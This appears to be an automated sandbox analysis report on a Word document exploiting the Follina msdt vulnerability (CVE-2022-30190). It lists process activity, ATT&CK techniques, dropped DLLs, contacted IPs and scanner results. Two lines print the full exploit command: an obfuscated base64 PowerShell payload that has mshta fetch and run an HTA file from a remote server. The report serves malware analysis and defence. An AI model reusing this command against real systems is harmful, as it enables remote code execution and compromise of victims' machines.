        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.dllJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 973
        Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 416
        Source: mshta.exe, 00000019.00000002.559412436.0000000000A46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWdClass0
        Source: mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000019.00000002.559502075.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.556934937.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.556713488.0000000002DDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5C8A.tmp" "c:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5BB.tmp" "c:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES55EE.tmp" "c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP"
        Source: rundll32.exe, 0000001E.00000002.557302079.0000000003380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: rundll32.exe, 0000001E.00000002.557302079.0000000003380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: rundll32.exe, 0000001E.00000002.557302079.0000000003380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: rundll32.exe, 0000001E.00000002.557302079.0000000003380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
        Source: C:\Windows\SysWOW64\msdt.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 0000001E.00000002.556428060.0000000002CE0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Command and Scripting Interpreter
        1
        DLL Side-Loading
        12
        Process Injection
        11
        Masquerading
        OS Credential Dumping1
        Query Registry
        Remote Services1
        Email Collection
        Exfiltration Over Other Network Medium11
        Non-Standard Port
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts22
        Exploitation for Client Execution
        Boot or Logon Initialization Scripts1
        DLL Side-Loading
        12
        Process Injection
        LSASS Memory1
        Security Software Discovery
        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
        Ingress Tool Transfer
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)1
        Extra Window Memory Injection
        1
        Rundll32
        Security Account Manager1
        Process Discovery
        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
        Non-Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
        DLL Side-Loading
        NTDS1
        Application Window Discovery
        Distributed Component Object ModelInput CaptureScheduled Transfer111
        Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Extra Window Memory Injection
        LSA Secrets1
        Remote System Discovery
        SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials2
        File and Directory Discovery
        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync14
        System Information Discovery
        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 647003 Sample: V3g2Pfu707.docx Startdate: 16/06/2022 Architecture: WINDOWS Score: 92 53 Malicious sample detected (through community Yara rule) 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 Yara detected Microsoft Office Exploit Follina CVE-2022-30190 2->57 59 6 other signatures 2->59 6 WINWORD.EXE 296 62 2->6         started        10 csc.exe 3 2->10         started        12 csc.exe 3 2->12         started        14 3 other processes 2->14 process3 dnsIp4 47 101.33.231.81, 49746, 49747, 49748 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN China 6->47 33 C:\Users\user\AppData\...\V3g2Pfu707.docx.LNK, MS 6->33 dropped 35 C:\Users\user\AppData\...\exploit[1].htm, HTML 6->35 dropped 37 C:\Users\user\AppData\Local\...\BE8733D.htm, HTML 6->37 dropped 39 C:\Users\user\AppData\Local\...\164F6553.htm, HTML 6->39 dropped 16 msdt.exe 21 6->16         started        19 MSOSYNC.EXE 5 12 6->19         started        41 C:\Users\user\AppData\Local\...\xppvbwul.dll, PE32 10->41 dropped 21 cvtres.exe 1 10->21         started        43 C:\Users\user\AppData\Local\...\s0ida0bj.dll, PE32 12->43 dropped 23 cvtres.exe 1 12->23         started        49 159.75.135.162, 49781, 61256 TELE2EU China 14->49 51 192.168.2.1 unknown unknown 14->51 45 C:\Users\user\AppData\Local\...\hfyslwgs.dll, PE32 14->45 dropped 25 cvtres.exe 1 14->25         started        27 rundll32.exe 14->27         started        file5 process6 file7 29 C:\Windows\Temp\...\DiagPackage.dll.mui, PE32 16->29 dropped 31 C:\Windows\Temp\...\DiagPackage.dll, PE32+ 16->31 dropped

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        V3g2Pfu707.docx34%VirustotalBrowse
        V3g2Pfu707.docx29%ReversingLabsDocument-Word.Exploit.CVE-2017-0199
        SourceDetectionScannerLabelLink
        C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\DiagPackage.dll0%MetadefenderBrowse
        C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\DiagPackage.dll0%ReversingLabs
        C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\en-US\DiagPackage.dll.mui0%MetadefenderBrowse
        C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\en-US\DiagPackage.dll.mui0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://roaming.edog.0%URL Reputationsafe
        https://cdn.entity.0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
        http://106.55.17.200/jquery-3.3.1.slim.min.js0%Avira URL Cloudsafe
        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
        http://159.75.135.162:61256/dllhost.htaindowsINetCookiesF&0%Avira URL Cloudsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://officeci.azurewebsites.net/api/0%URL Reputationsafe
        http://159.75.135.162:61256/dllhost.htaV0%Avira URL Cloudsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        http://159.75.135.162:61256/dllhost.htaY0%Avira URL Cloudsafe
        https://api.aadrm.com0%URL Reputationsafe
        https://106.55.17.200:62002/0%Avira URL Cloudsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
        http://159.75.135.162:61256/dllhost.htag0%Avira URL Cloudsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        http://159.75.135.162:61256/dllhost.htaET4.C:0%Avira URL Cloudsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://wus2.contentsync.0%URL Reputationsafe
        https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
        https://106.55.17.200/0%Avira URL Cloudsafe
        https://106.55.17.200:62002/jquery-3.3.1.slim.min.js0%Avira URL Cloudsafe
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
        No contacted domains info
        NameMaliciousAntivirus DetectionReputation
        http://106.55.17.200/jquery-3.3.1.slim.min.jstrue
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://api.diagnosticssdf.office.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
          high
          https://login.microsoftonline.com/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
            high
            https://shell.suite.office.com:1443898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
              high
